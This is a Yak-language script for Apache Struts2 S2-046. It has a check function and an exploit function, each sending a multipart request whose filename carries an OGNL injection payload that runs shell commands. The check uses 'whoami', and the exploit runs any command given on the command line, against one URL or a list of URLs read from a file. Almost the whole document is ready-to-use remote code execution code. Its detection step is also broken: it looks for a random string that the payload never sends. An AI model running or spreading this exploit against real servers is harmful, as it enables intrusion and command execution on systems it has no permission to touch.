//定义检测函数
func poc(url){
    ascii_00,err = codec.DecodeASCII(`"\x00"`)
    if err != nil{
        return 
    }
    random_str = randstr(8)

    payload = `------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="pocfile"; filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}`+ascii_00+`b"
Content-Type: application/octet-stream

tdwefewwe
------WebKitFormBoundaryAnmUgTEhFhOZpr9z--`

    
    req, err = http.Post(
        url,
        http.useragent(http.uarand()),
        http.header("Content-Type","multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z"),
        http.body(payload),
        http.proxy("http://localhost:8081" /*type ...[]string*/),
    )
    if err != nil {
        return
    }
    if re.Match(random_str,http.GetAllBody(req)){
        log.warn( url + " S2_046 found !!!")
    }else{
        log.debug(url + " S2_046 safe !!!")
    }
    
}


//定义利用函数
func exp(url,cmd){

    ascii_00,err = codec.DecodeASCII(`"\x00"`)
    if err != nil{
        return 
    }
    // payload = `debug=command&expression=%23a%3D%28new%20java.lang.ProcessBuilder%28``%27%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23out%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23out.getWriter%28%29.println%28%27dbapp%3A%27%2bnew%20java.lang.String%28%23e%29%29%2C%23out.getWriter%28%29.flush%28%29%2C%23out.getWriter%28%29.close%28%29%0A`
    payload = `------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="pocfile"; filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='`+cmd+`').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}`+ascii_00+`b"
Content-Type: application/octet-stream

tdwefewwe
------WebKitFormBoundaryAnmUgTEhFhOZpr9z--`
    // println(payload)
    req, err = http.Post(
        url,
        http.useragent(http.uarand()),
        http.header("Content-Type","multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z"),
        http.body(payload),
        )
    println(string(http.GetAllBody(req)))
   // http.show(req)
}


if YAK_MAIN {
    loglevel("info")
    u = cli.String("u")
    file = cli.LineDict("f")
    cmd = cli.String("cmd")

    if u == "" && len(file)<1 {
        log.info("you need input target -u or -f")
        return
    }

    if u != ""{
        if cmd != ""{
            exp(u,cmd)
        }else{
            poc(u)
        }
        return
    }

    for _,u = range file {
         if cmd != "" {
            exp(u,cmd)
        }else{
            poc(u)
        }
    }

}